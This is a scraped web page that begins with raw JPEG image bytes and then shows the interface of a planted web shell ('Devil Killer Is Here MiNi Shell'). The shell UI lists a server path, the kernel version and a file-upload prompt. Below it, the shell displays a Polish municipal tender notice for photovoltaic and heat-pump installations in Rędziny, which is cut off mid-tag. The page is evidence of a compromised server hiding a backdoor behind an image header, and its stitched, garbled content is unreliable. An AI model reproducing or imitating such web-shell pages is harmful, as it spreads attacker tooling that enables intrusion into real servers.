JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220905/0033266201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlano-instalacyjnych ramach zadania inwestycyjnego pn.:„Budowa instalacji wykorzystujących odnawialne źródła energii na obszarze gminy Rędziny”– wg formuły: zaprojektuj i wybuduj </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Rędziny</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398161</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 87</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rędziny</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-242</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 3279085</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">34 3279085</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@redziny.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.redziny.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlano-instalacyjnych ramach zadania inwestycyjnego pn.:„Budowa instalacji wykorzystujących odnawialne źródła energii na obszarze gminy Rędziny”– wg formuły: zaprojektuj i wybuduj </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a08a97f8-2cea-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00332662</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00004555/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa instalacji wykorzystujących odnawialne źródła energii na obszarze gminy Rędziny - wg formuły zaprojektuj i zbuduj</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie realizowane jest w ramach programu : „Budowa instalacji wykorzystujących odnawialne źródła energii na obszarze gmin: Rędziny i Mstów” Zadanie dofinansowane w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014-2020 (EFRR) </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a08a97f8-2cea-11ed-8832-4e4740e186ac <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal lub poczty elektronicznej .<br/>2.	Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/> Jacek Jaśkiewicz - Referat Organizacyjny, Funduszy Zewnętrznych i Inwestycji Urzędu Gminy Rędziny ul. Wolności 87 , pokój nr 16, tel. +48 34 3279 085, w godz. 730-1500 e-mail : ug@redziny.pl, inwestycje@redziny.pl <br/> – w zakresie procedury i przedmiotu zamówienia.<br/>3 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia <br/> publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma <br/> dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub <br/> wniosku” oraz do „Formularza do komunikacji”.<br/>4 Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/> elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich <br/> użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz warunkach <br/> korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: <br/> „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>7. Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania.<br/>8. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarto w pkt. 8 swz dostępnej na stronie https://bip.redziny.pl/przetargi .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ROZPORZĄDZENIA PARLAMENTU EUROPEJSKIEGO I RADY (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (RODO) informujemy, że: <br/>1.	Administrator danych: Administratorem Państwa danych osobowych jest Urząd Gminy w Rędzinach reprezentowany przez Wójta Gminy. <br/>2.	Dane kontaktowe: Kontakt z administratorem: Urząd Gminy w Rędzinach, ul. Wolności 87, 42 – 242 Rędziny, nr telefon 34 3279014, adres poczty elektronicznej: ug@redziny.pl;<br/>3.	Inspektor Ochrony Danych: W Urzędzie Gminy w Rędzinach został wyznaczony Inspektor Ochrony Danych, z którym można skontaktować się za pośrednictwem poczty elektronicznej: inspektor@odocn.pl <br/>4.	Cele przetwarzania, podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych: Dane będą przetwarzane przez Urząd Gminy w Rędzinach w celach: <br/>1)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym na podstawie art. 275 pkt 1 ustawy Pzp – znak sprawy ZP.271.10.2022. <br/>2)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. <br/>5.	Odbiorcy danych: <br/>1)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; udostępnianie danych, o którym mowa w art. 74 ust. 1 i 2 ustawy Pzp ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO (szczególne kategorie danych osobowych) zebranych w toku postępowania o udzielenie zamówienia; dane osobowe, o których mowa w art. <br/>10 RODO (dane osobowe dotyczące wyroków skazujących i naruszeń prawa), Administrator (Zamawiający) udostępnia w celu umożliwienia korzystania ze środków ochrony prawnej, do upływu terminu na ich wniesienie. <br/>2)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. <br/>6.	Prawa osoby, której dane dotyczą: <br/>Osoby, których dane osobowe przetwarza Urząd Gminy mają prawo do: <br/>▪	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*. <br/>▪	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**. <br/>▪	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***. <br/>▪	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. <br/>Nie przysługuje Pani/Panu: <br/>▪	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>▪	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>▪	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie zadania pn.: <br/> Wykonanie robót budowlano-instalacyjnych ramach zadania inwestycyjnego pn.: „Budowa instalacji wykorzystujących odnawialne źródła energii na obszarze gminy Rędziny” – wg formuły: zaprojektuj i wybuduj.<br/>2. Zakres zamówienia obejmuje wykonanie następujących prac budowlano-instalacyjnych i projektowych:<br/>2.1.	Panele fotowoltaiczne.<br/>2.1.1.	Wykonanie niezbędnej dokumentacji projektowej (w ilości 102 kpl oddzielnych projektów) dla montażu 102 kpl. OZE instalacji paneli fotowoltaicznych na potrzeby budynków mieszkalnych jednorodzinnych na obszarze Gminy Rędziny oraz uzyskanie wszelkich wymaganych zgodnie z aktualnym prawem budowlanym uzgodnień, opinii i decyzji.<br/>2.1.2.	Wykonanie wszystkich robót budowlanych i instalacyjnych wg opracowanych projektów, polegających na dostawie i montażu 102 kpl. OZE kompletów instalacji paneli fotowoltaicznych na potrzeby budynków mieszkalnych i podłączeniu do istniejącej instalacji elektrycznej celem współpracy z układem wraz z udzieleniem gwarancji na wykonane roboty i dostarczone i zamontowane materiały.<br/>2.1.3.	Zakres prac budowlanych obejmuje wykonanie instalacji OZE (instalacji fotowoltaicznych), w skład której wchodzą:<br/>	moduły fotowoltaiczne o mocy min. 270 Wp o roku produkcji nie starsze niż 2022 r.,<br/>	optymalizatory mocy,<br/>	konstrukcje wsporcze,<br/>	inwertery (falowniki),<br/>	okablowanie,<br/>	zabezpieczenie AC i DC,<br/>	pozostały osprzęt niezbędny do podłączania instalacji fotowoltaicznej do instalacji elektrycznej budynku.<br/>Minimalne parametry paneli fotowoltaicznych - określone z KDT (zał. nr 12a do SWZ).<br/>2.1.4.	Rozruch technologiczny instalacji fotowoltaicznych – poprzez przeprowadzenie wymaganych prób i badań przed uzyskaniem odbiorów robót, przygotowanie dokumentów związanych z przekazaniem do użytkowania wybudowanych instalacji oraz udzielenie instrukcji użytkownikom w celu prawidłowego ich użytkowania.<br/>2.1.5.	Wykonanie dokumentacji powykonawczych po wykonaniu robót instalacyjnych ( 102 kpl).<br/>2.1.6.	Serwisowanie instalacji fotowoltaicznych przez okres trwałości projektu i udzielonej gwarancji – min. 2 razy w okresie udzielonej gwarancji w drugim i ostatnim roku trwania gwarancji.<br/>2.1.7.	Wykonywanie raportów – zestawienia audytów z efektu energetyczno-ekologicznego na podstawie rzeczywistych odczytów z zastosowaniem systemu monitoringu, zawierającego:<br/>	liczbę wybudowanych instalacji fotowoltaicznych objętych projektem;<br/>	suma mocy wszystkich instalacji fotowoltaicznych zainstalowanych na potrzeby budynków mieszkalnych objętych projektem;<br/>	ilość wyprodukowanej energii elektrycznej z nowo wybudowanych instalacji fotowoltaicznych objętych projektem przez okres 12 miesięcy.<br/><br/>2.2.	Pompy ciepła powietrzne i gruntowe<br/>2.2.1.	Wykonanie niezbędnej dokumentacji projektowej (w ilości 25 kpl oddzielnych projektów) dla montażu 25 kpl. OZE instalacji pomp ciepła powietrznych ( 16 kpl) i gruntowych (9 kpl) na potrzeby budynków mieszkalnych jednorodzinnych na obszarze Gminy Rędziny oraz uzyskanie wszelkich wymaganych zgodnie z aktualnym prawem budowlanym uzgodnień, opinii i decyzji.<br/>2.2.2.	Wykonanie wszystkich robót budowlanych i instalacyjnych wg opracowanych projektów, polegających na dostawie i montażu 25 kpl. instalacji pomp ciepła powietrznych ( 16 kpl) i gruntowych (9 kpl) na potrzeby budynków mieszkalnych i podłączeniu do istniejącej instalacji celem współpracy z układem wraz z udzieleniem gwarancji na wykonane roboty i dostarczone i zamontowane materiały.<br/>2.2.3.	Zakres prac budowlanych obejmuje wykonanie instalacji OZE (instalacji powietrznych pomp ciepła ), w skład której wchodzą:<br/>	powietrzna sprężarkowa pompa ciepła wraz z automatyką, fundamentem i systemem odprowadzenia skroplin,<br/>	bufor ciepła,<br/>	licznik ciepła, licznik energii elektrycznej,<br/>	zasobnik c.w.u.;<br/>	podłączenie pompy do istniejących instalacji w budynku (woda, c.w.u, instalacja el.);<br/>	pozostały osprzęt instalacyjny,<br/>	próby i uruchomienie.<br/>Minimalne parametry sprężarkowych powietrznych pomp ciepła typu powietrze-woda - określone z KDT (zał. nr 12b do SWZ).<br/>2.2.4.	Zakres prac budowlanych obejmuje wykonanie instalacji OZE (instalacji gruntowych pomp ciepła ), w skład której wchodzą:<br/>	gruntowa pompa ciepła wraz z automatyką rok produkcji nie starszy niż 2021r,<br/>	bufor ciepła,<br/>	licznik ciepła, licznik energii elektrycznej,<br/>	zasobnik c.w.u.;<br/>	gruntowy wymiennik ciepła;<br/>	studzienka rozdzielaczowa;<br/>	podłączenie pompy do istniejących instalacji w budynku (woda, c.w.u, instalacja el.),<br/>	pozostały osprzęt instalacyjny,<br/>	próby i uruchomienie.<br/><br/>Minimalne parametry sprężarkowych powietrznych pomp ciepła typu glikol – woda - określone z KDT (zał. nr 12b do SWZ).<br/>2.2.5.	Rozruch technologiczny instalacji pomp ciepła – poprzez podłączenie pomp do istniejących instalacji w budynku, przeprowadzenie wymaganych prób i badań przed uzyskaniem odbiorów robót, przygotowanie dokumentów związanych z przekazaniem do użytkowania wybudowanych instalacji oraz udzielenie instrukcji użytkownikom w celu prawidłowego ich użytkowania.<br/>2.2.6.	Wykonanie dokumentacji powykonawczych po wykonaniu robót instalacyjnych ( 25 kpl).<br/>2.2.7.	Serwisowanie instalacji pomp ciepła przez okres trwałości projektu i udzielonej gwarancji – min. 2 razy w okresie udzielonej gwarancji w drugim i ostatnim roku.<br/>2.2.8.	Wykonywanie raportów – zestawienia audytów z efektu energetyczno-ekologicznego, na podstawie rzeczywistych odczytów z zastosowaniem systemu monitoringu, zawierającego:<br/>	liczbę wybudowanych instalacji pomp ciepła objętych projektem;<br/>	stopień redukcji CO2 w wyniku zmniejszenia emisji zanieczyszczeń generowanych przez instalacje OZE objęte projektem za okres 12 miesięcy;<br/>	ilość wyprodukowanej energii cieplnej elektrycznej z nowo wybudowanych instalacji pomp ciepła objętych projektem przez okres 12 miesięcy;<br/>	stopień redukcji PM10 w wyniku zmniejszenia emisji zanieczyszczeń generowanych przez instalacje OZE objęte projektem za okres 12 miesięcy<br/>	suma mocy wszystkich pomp ciepła zainstalowanych na potrzeby budynków mieszkalnych objętych projektem.<br/><br/>3.3.	Szczegółowy opis przedmiotu zamówienia został zawarty w niniejszej SWZ, projektowanych postanowieniach umowy – stanowiących załącznik do SWZ oraz następujących dokumentach – stanowiących załącznik do SWZ:<br/>	OPZ – opis przedmiotu zamówienia - panele PV – patrz PFU<br/>	OPZ – opis przedmiotu zamówienia - pompy ciepła – patrz PFU<br/>	KDT (karta danych technicznych) - panele PV<br/>	KDT (karta danych technicznych) – pompy ciepła<br/>UWAGA:<br/>1.	Wykonawca zapewni możliwość podłączenia modułu LAN, karty pamięci i współpracy z systemem monitoringu – w celu odczytu wskaźników na bieżąco oraz możliwości zliczenia wskaźnika z 12 miesięcy.<br/>2.	Zamawiający zastrzega sobie prawo do modyfikacji listy lokalizacji instalacji. Rodzaj instalacji i łączna liczba instalacji w poszczególnych zestawach może ulec zmianie. W przypadku zmniejszenia ilości instalacji Wykonawca otrzyma wynagrodzenie odpowiednie do ilości zaprojektowanych i wykonanych zestawów instalacji fotowoltaicznych i pomp ciepła. Nie ma możliwości zwiększenia ilości instalacji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45300000-0 - Roboty instalacyjne w budynkach</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71321200-6 - Usługi projektowania systemów grzewczych</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45262220-9 - Wiercenie studni wodnych</p> <p class="mb-0">71314100-3 - Usługi elektryczne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45261215-4 - Pokrywanie dachów panelami ogniw słonecznych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45315300-1 - Instalacje zasilania elektrycznego</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie odrzuconych na podstawie art. 226 Pzp. <br/>2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1) cena oferty (C) – 100% <br/>3.	Sposób oceny ofert: <br/>W kryterium „cena oferty”, w którym zamawiającemu zależy, aby wykonawca przedstawił jak najniższą wartość (cena), zostanie zastosowany następujący wzór: <br/><br/>Liczba Cn <br/>zdobytych (C) = ----------- x 100 x waga kryterium 100% punktów Cb<br/><br/>Gdzie: <br/>Cn – cena najniższa wśród ofert nie odrzuconych <br/>Cb – cena oferty badanej <br/>100 – wskaźnik stały <br/>100 – procentowe znaczenie kryterium ceny <br/>Liczba punktów, którą można uzyskać w ramach kryterium cena obliczona zostanie przez podzielenie ceny najniższej z ofert przez cenę ocenianej oferty i pomnożenie tak otrzymanej liczby przez 100 punktów i wagę kryterium, którą ustalono na 100%. <br/>4.	Zamawiający zastosuje zaokrąglanie każdego wyniku do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 